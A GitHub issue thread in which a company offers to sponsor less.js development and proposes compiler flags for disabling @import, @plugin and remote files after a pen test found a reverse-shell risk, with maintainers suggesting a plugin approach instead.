We'd like to sponsor less.js!

[matthew-gill]

Hello @matthew-dean !

We use the less.js plugin in our platform to allow users to write less to customise pages which get displayed on our client's sites.

Our company, Mention Me (https://mention-me.com), would love to be able to contribute back to the less community, so I'd like to open up a conversation to see if you or your team would be willing to take on some sponsored work if we would be willing to pay for it.

There are some security concerns which have been flagged by our annual penetration test relating to our use of this library. As we allow user input to go through the less compiler, there are lots of things we need to be careful with.

We have some code snippets which our pen test found which can result in a reverse shell being opened, so in the interest of security, I'll leave them out of this issue - feel free to contact me directly and I can share them with you (matt.gill@mention-me.com)

Some ideas which would be great to introduce via the lessc flags might be the following

--disable-at-rules-all # (Disable ALL at rules)
--disable-at-rules-import # (Disable all @import)
--disable-at-rules-plugin # (Disable all @plugin)
--enabled-at-rules=media,supports
...
--remote-file-approved-domains=https://foo.com,https://bar.com
--remote-file-enforce-https

Would this be something you'd be willing to have a conversation with us about? Ideally we'd be able to contribute these directly by raising a PR, but we'd like to get the owner of the module who knows the code best to introduce the changes.

cc @edhgoose

[matthew-dean]

Hi @matthew-gill. Unfortunately, I work full time and don't have extra time to devote to Less. If I had extra time, I would probably be investing it in other projects. But maybe someone else could see this and you could contract with them.

I feel like the options you mention are a bit verbose and I'm not sure of the utility of something like --disable-at-rules-import for general usage. Something you could consider would be adding these options as part of a plugin.

[iChenLei]

@matthew-gill Agree with matthew-dean's suggestion. I think you can do these work via less-plugin-xxx, less.js contain these bulitin options is not possible, all these options can be treated as content filter, less plugin is a better solution.

Btw, I accept sponsorship for the special less-plugin-xx development.

[matthew-dean]

Note that --disable-plugin-rule has been added as of this PR -- #3701